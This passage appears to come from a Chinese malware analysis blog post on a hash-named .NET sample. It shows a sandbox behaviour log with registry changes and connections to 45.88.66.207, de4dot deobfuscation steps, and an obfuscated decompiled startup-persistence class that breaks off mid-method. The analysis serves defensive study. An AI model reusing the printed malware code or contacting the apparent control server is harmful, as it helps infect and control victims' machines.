09:37:10:539,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:328,	9028,	FILE_chmod,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:539,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:4972,	9028,	FILE_chmod,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:539,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:4960,	9028,	FILE_chmod,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:617,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:7628,	9028,	FILE_readdir,	C:\Windows\Microsoft.NET\Framework,	filter:'*' ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:679,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:7628,	9028,	FILE_read,	C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config,	offset:0x00000000 datalen:0x00000FFF ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:695,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:7628,	9028,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib,	filter:'*' ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:695,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:7628,	9028,	FILE_read,	C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\f2d02f64584169cfed0597e2d00f0a67\mscorlib.ni.dll.aux,	offset:0x00000000 datalen:0x000000B0 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:695,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:0,	9028,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\f2d02f64584169cfed0597e2d00f0a67\mscorlib.ni.dll,	base:0x000000006FDD0000 size:0x0140E000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:710,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:7628,	9028,	FILE_read,	C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config,	offset:0x00000000 datalen:0x00000FFF ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:710,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:7628,	9028,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#,	filter:'*' ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:710,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:7628,	9028,	FILE_read,	C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\03a6965bc1bb789f37779e8951ecafc7\Microsoft.VisualBasic.ni.dll.aux,	offset:0x00000000 datalen:0x000006AC ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:710,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:7628,	9028,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System,	filter:'*' ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:710,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:7628,	9028,	FILE_read,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System\d06666c43ff6c690db91fd4cde7ddf1c\System.ni.dll.aux,	offset:0x00000000 datalen:0x0000026C ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:758,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:0,	9028,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System\d06666c43ff6c690db91fd4cde7ddf1c\System.ni.dll,	base:0x000000006F370000 size:0x00A55000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:758,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:7628,	9028,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core,	filter:'*' ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:758,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:7628,	9028,	FILE_read,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\55a85a201d7cfebdc16d4357e3c4efb2\System.Core.ni.dll.aux,	offset:0x00000000 datalen:0x00000384 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:789,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:0,	9028,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\55a85a201d7cfebdc16d4357e3c4efb2\System.Core.ni.dll,	base:0x000000006EB50000 size:0x00818000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:821,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:0,	9028,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\03a6965bc1bb789f37779e8951ecafc7\Microsoft.VisualBasic.ni.dll,	base:0x00000000730B0000 size:0x001E2000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:11:043,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:7628,	9028,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms,	filter:'*' ,	0x00000000 [The operation completed successfully.  ],	
09:37:11:055,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:7628,	9028,	FILE_read,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\37c31fb353175d6efd4ca9dc426cab68\System.Windows.Forms.ni.dll.aux,	offset:0x00000000 datalen:0x000006B8 ,	0x00000000 [The operation completed successfully.  ],	
09:37:11:055,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:7628,	9028,	FILE_read,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\59978a45568399ef08cfe99da6a725bb\System.Windows.Forms.ni.dll.aux,	offset:0x00000000 datalen:0x000006B8 ,	0x00000000 [The operation completed successfully.  ],	
09:37:11:055,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:7628,	9028,	FILE_read,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\dd2f3bb5941e68b9d4d6affbe6fcc632\System.Windows.Forms.ni.dll.aux,	offset:0x00000000 datalen:0x000006B8 ,	0x00000000 [The operation completed successfully.  ],	
09:37:11:070,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:7628,	9028,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing,	filter:'*' ,	0x00000000 [The operation completed successfully.  ],	
09:37:11:070,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:7628,	9028,	FILE_read,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\167c4b04ac34ab24a58f841c21862a3e\System.Drawing.ni.dll.aux,	offset:0x00000000 datalen:0x00000248 ,	0x00000000 [The operation completed successfully.  ],	
09:37:11:070,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:7628,	9028,	FILE_read,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\67e34187cff6cf0d7e49a0b354229d26\System.Drawing.ni.dll.aux,	offset:0x00000000 datalen:0x00000248 ,	0x00000000 [The operation completed successfully.  ],	
09:37:11:070,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:7628,	9028,	FILE_read,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\ef599b69e76b0aaae802df819481912b\System.Drawing.ni.dll.aux,	offset:0x00000000 datalen:0x00000248 ,	0x00000000 [The operation completed successfully.  ],	
09:37:11:070,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:0,	9028,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\ef599b69e76b0aaae802df819481912b\System.Drawing.ni.dll,	base:0x0000000072B50000 size:0x001A3000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:11:101,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:0,	9028,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\dd2f3bb5941e68b9d4d6affbe6fcc632\System.Windows.Forms.ni.dll,	base:0x000000006DCE0000 size:0x00E68000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:12:182,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:7628,	9028,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration,	filter:'*' ,	0x00000000 [The operation completed successfully.  ],	
09:37:12:182,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:7628,	9028,	FILE_read,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\6b3b4bf6dbe30207f4ef50f235d9a8ab\System.Configuration.ni.dll.aux,	offset:0x00000000 datalen:0x00000360 ,	0x00000000 [The operation completed successfully.  ],	
09:37:12:182,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:0,	9028,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\6b3b4bf6dbe30207f4ef50f235d9a8ab\System.Configuration.ni.dll,	base:0x0000000072420000 size:0x00106000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:12:213,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:7628,	9028,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml,	filter:'*' ,	0x00000000 [The operation completed successfully.  ],	
09:37:12:213,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:7628,	9028,	FILE_read,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\7f615844ab7c9db651cca958c10624f5\System.Xml.ni.dll.aux,	offset:0x00000000 datalen:0x000002EC ,	0x00000000 [The operation completed successfully.  ],	
09:37:12:228,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:0,	9028,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\7f615844ab7c9db651cca958c10624f5\System.Xml.ni.dll,	base:0x000000006D330000 size:0x00774000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:12:244,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:7628,	9028,	FILE_read,	C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config,	offset:0x00000000 datalen:0x00000FFF ,	0x00000000 [The operation completed successfully.  ],	
09:37:12:244,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:7628,	9028,	FILE_read,	C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config,	offset:0x00000000 datalen:0x00001000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:12:260,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:0,	9028,	EXEC_module_load,	C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.17763.737_none_588eeadb78ace734\comctl32.dll,	base:0x0000000072F60000 size:0x0008E000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:12:275,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:0,	9028,	EXEC_module_load,	C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.17763.737_none_7e4e6d38762cf81f\GdiPlus.dll,	base:0x000000006D1C0000 size:0x0016F000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:16:197,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:7628,	9028,	FILE_read,	C:\Users\bonelee\Desktop\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	offset:0x00000000 datalen:0x000D2C00 ,	0x00000000 [The operation completed successfully.  ],	
09:37:16:197,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:0,	9028,	PROC_exec,	C:\Users\bonelee\Desktop\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	target_pid:2092 cmdline:'"C:\Users\bonelee\Desktop\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe"' ,	0x00000000 [The operation completed successfully.  ],	
09:37:48:793,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	2092:0,	9028,	EXEC_create,	C:\Users\bonelee\Desktop\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	parent_pid:9028 cmdline:'"C:\Users\bonelee\Desktop\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe"' image_base:0x0000000000E70000 image_size:0x000D8000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:48:808,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:8300,	9028,	FILE_truncate,	C:\Users\bonelee\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe.log,	eof:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:48:808,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:8300,	9028,	FILE_write,	C:\Users\bonelee\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe.log,	offset:0x00000000 datalen:0x000005E6 ,	0x00000000 [The operation completed successfully.  ],	
09:37:48:808,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:8300,	9028,	FILE_read,	C:\Users\bonelee\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe.log,	offset:0x00000000 datalen:0x00000002 ,	0x00000000 [The operation completed successfully.  ],	
09:37:48:808,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:0,	9028,	FILE_modified,	C:\Users\bonelee\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe.log,	,	0x00000000 [The operation completed successfully.  ],	
09:37:48:808,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	2092:0,	9028,	EXEC_module_load,	C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.17763.737_none_7e4e6d38762cf81f\GdiPlus.dll,	base:0x000000006D1C0000 size:0x0016F000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:48:839,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:0,	9028,	EXEC_destroy,	C:\Users\bonelee\Desktop\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	parent_pid:8200 cmdline:'C:\Users\bonelee\Desktop\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe' ,	0x00000000 [The operation completed successfully.  ],	
09:37:48:855,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	2092:4724,	9028,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix,	type:0x00000001 datalen:2 data:'00 ' ,	0x00000000 [The operation completed successfully.  ],	
09:37:48:855,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	2092:4724,	9028,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix,	type:0x00000001 datalen:16 data:'43 6F 6F 6B 69 65 3A 00 ' ,	0x00000000 [The operation completed successfully.  ],	
09:37:48:855,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	2092:4724,	9028,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix,	type:0x00000001 datalen:18 data:'56 69 73 69 74 65 64 3A 00 ' ,	0x00000000 [The operation completed successfully.  ],	
09:37:48:855,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	2092:1484,	9028,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass,	type:0x00000004 datalen:4 data:'01 00 00 00 ' ,	0x00000000 [The operation completed successfully.  ],	
09:37:48:855,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	2092:1484,	9028,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName,	type:0x00000004 datalen:4 data:'01 00 00 00 ' ,	0x00000000 [The operation completed successfully.  ],	
09:37:48:855,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	2092:1484,	9028,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet,	type:0x00000004 datalen:4 data:'01 00 00 00 ' ,	0x00000000 [The operation completed successfully.  ],	
09:37:48:855,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	2092:1484,	9028,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect,	type:0x00000004 datalen:4 data:'00 00 00 00 ' ,	0x00000000 [The operation completed successfully.  ],	
09:37:48:855,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	2092:1484,	9028,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass,	type:0x00000004 datalen:4 data:'01 00 00 00 ' ,	0x00000000 [The operation completed successfully.  ],	
09:37:48:855,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	2092:1484,	9028,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName,	type:0x00000004 datalen:4 data:'01 00 00 00 ' ,	0x00000000 [The operation completed successfully.  ],	
09:37:48:855,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	2092:1484,	9028,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet,	type:0x00000004 datalen:4 data:'01 00 00 00 ' ,	0x00000000 [The operation completed successfully.  ],	
09:37:48:855,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	2092:1484,	9028,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect,	type:0x00000004 datalen:4 data:'00 00 00 00 ' ,	0x00000000 [The operation completed successfully.  ],	
09:37:48:871,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	2092:1484,	9028,	NET_connect,	45.88.66.207:80,	protocol:(TCP)0 ,	0x00000000 [The operation completed successfully.  ],	
09:37:57:432,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	2092:4724,	9028,	NET_connect,	45.88.66.207:80,	protocol:(TCP)0 ,	0x00000000 [The operation completed successfully.  ],	
09:38:04:740,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	2092:0,	9028,	EXEC_destroy,	C:\Users\bonelee\Desktop\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	parent_pid:9028 cmdline:'"C:\Users\bonelee\Desktop\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe"' ,	0x00000000 [The operation completed successfully.  ],

  

可以看到有网络连接:

样本分析  99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d 由于.net程序配置文件缺失导致无法正常运行_EXEC_02

 

 

混淆了:

D:\app\de4dot-built-binaries-main\net45>de4dot.exe -d D:\Downloads\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe

de4dot v3.1.41592.3405

Detected DeepSea 4.1 (D:\Downloads\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe)

D:\app\de4dot-built-binaries-main\net45>de4dot.exe  D:\Downloads\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe

de4dot v3.1.41592.3405

Detected DeepSea 4.1 (D:\Downloads\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe)
Cleaning D:\Downloads\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe
Renaming all obfuscated symbols
ERROR: Could not resolve MethodRef Jw97Bt.Kz97Rd/b7KXo3.r1L9Hg Jw97Bt.Kz97Rd/f2D0Sc.y5C8Sj<Jw97Bt.Kz97Rd/b7KXo3.r1L9Hg>::N() (0A00002D) (from Gk73K -> Gk73K)
WARNING: Could not find resource WindowsApp1.Resources
Saving D:\Downloads\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d-cleaned.exe
Ignored 4 warnings/errors
Use -v/-vv option or set environment variable SHOWALLMESSAGES=1 to see all messages

  

混淆的关键代码:

样本分析  99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d 由于.net程序配置文件缺失导致无法正常运行_安全分析_03

 

extrac出来看看,依然是混淆了!继续反混淆,看到的代码样子类似如下:

 

using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.Win32;

namespace FIFAWORLDCUP
{
	// Token: 0x0200001C RID: 28
	public class Class12_Startup
	{
		// Token: 0x06000115 RID: 277 RVA: 0x0001E810 File Offset: 0x0001CA10
		internal static bool FinishContinuations(string string_0, string string_1, string string_2, bool bool_0)
		{
			bool flag = Convert.ToInt32((double)-18693f) + Convert.ToInt32(42805.0 + Math.Round(42805.5)) / <Module>.ValidateKeyView(int.Parse("7")) - Convert.ToInt32((double)66917f) / <Module>.ValidateKeyView(int.Parse("9")) != 0;
			using (RegistryKey registryKey = Registry.CurrentUser.OpenSubKey(string_0, Convert.ToInt32((double)-25980f) + Convert.ToInt32(3328.5026746201584 - Math.Cos(1664.0)) / <Module>.ValidateKeyView(int.Parse("13")) + Convert.ToInt32((double)22652f) / <Module>.ValidateKeyView(int.Parse("9")) - Type.EmptyTypes.Length + Type.EmptyTypes.Length != 0))
			{
				if (((registryKey == null) ? (Convert.ToInt32(1742.71775024737 + Math.Tan(878.0)) / <Module>.ValidateKeyView(int.Parse("1")) + Convert.ToInt32(71261.0 - Math.Round(23753.5)) / <Module>.ValidateKeyView(int.Parse("7")) - Convert.ToInt32(49258.60850913985 + Math.Log10(24631.5)) / <Module>.ValidateKeyView(int.Parse("4")) + Type.EmptyTypes.Length + Type.EmptyTypes.Length) : ((registryKey.GetValue(string_1) == null) ? 1 : 0)) != 0)
				{
					flag = (Convert.ToInt32((double)-2769f) + Convert.ToInt32(101784.0 - Math.Ceiling(33928.0)) / <Module>.ValidateKeyView(int.Parse("11")) - Convert.ToInt32(32543.0 + Math.Ceiling(32543.5)) / <Module>.ValidateKeyView(int.Parse("5")) + Type.EmptyTypes.Length + Type.EmptyTypes.Length != 0);
				}
				else if ((registryKey.GetValue(string_1).ToString().Contains(string_2) ? 1 : 0) == (int.Parse("-794158252") ^ int.Parse("794070017")) + Convert.ToInt32(62933.30313586881 - Math.Sin(31466.5)) / <Module>.ValidateKeyView(int.Parse("5")) + Convert.ToInt32((double)29398f) / <Module>.ValidateKeyView(int.Parse("5")) + Type.EmptyTypes.Length + Type.EmptyTypes.Length)
				{
					flag = ((int.Parse("-307881638") ^ int.Parse("307845457")) + Convert.ToInt32(7068.198817555759 - Math.Sqrt(3504.5)) / <Module>.ValidateKeyView(int.Parse("4")) + (int.Parse("63199555") ^ int.Parse("63241687")) / <Module>.ValidateKeyView(int.Parse("10")) - Type.EmptyTypes.Length - Type.EmptyTypes.Length != 0);
				}
				if ((flag ? 1 : 0) == Convert.ToInt32(31794.857105094576 - Math.Cos(15897.0)) / <Module>.ValidateKeyView(int.Parse("9")) + Convert.ToInt32((double)23443f) / <Module>.ValidateKeyView(int.Parse("14")) - Convert.ToInt32(27618.0 + Math.Ceiling(27618.5)) / <Module>.ValidateKeyView(int.Parse("2")) + Type.EmptyTypes.Length + Type.EmptyTypes.Length)
				{
					if (bool_0)
					{
						string_2 = Class12_Startup.ReservedMask(string_0, string_1, string_2);
					}
					Class12_Startup.DontWriteAnything(string_0, string_1, string_2);
				}
			}
			return flag;
		}

		// Token: 0x06000116 RID: 278 RVA: 0x0001EBC8 File Offset: 0x0001CDC8
		private static string ReservedMask(string string_0, string string_1, string string_2)
		{
			using (Registry.CurrentUser.OpenSubKey(string_0, Convert.ToInt32(17167.5 - Math.Abs(5722.5)) / <Module>.ValidateKeyView(int.Parse("6")) + Convert.ToInt32(25950.840024526984 + Math.Sqrt(13032.5)) / <Module>.ValidateKeyView(int.Parse("1")) - Convert.ToInt32(37509.68172000347 - Math.Tan(18755.0)) / <Module>.ValidateKeyView(int.Parse("4")) - Type.EmptyTypes.Length + Type.EmptyTypes.Length != 0))
			{
				string_2 = Registry.LocalMachine.OpenSubKey(string_0, Convert.ToInt32(88436.64557945158 - Math.Log10(44216.0)) / <Module>.ValidateKeyView(int.Parse("4")) + Convert.ToInt32(5106.0 - Math.Truncate(1702.0)) / <Module>.ValidateKeyView(int.Parse("9")) - Convert.ToInt32(91836.52286918914 - Math.Tan(45918.0)) / <Module>.ValidateKeyView(int.Parse("7")) - Type.EmptyTypes.Length - Type.EmptyTypes.Length != 0).GetValue(string_1).ToString() + "," + string_2 + ",";
			}
			return string_2;
		}

		// Token: 0x06000117 RID: 279 RVA: 0x0001ED58 File Offset: 0x0001CF58
		internal static bool Get_AutoFlush(string string_0)
		{
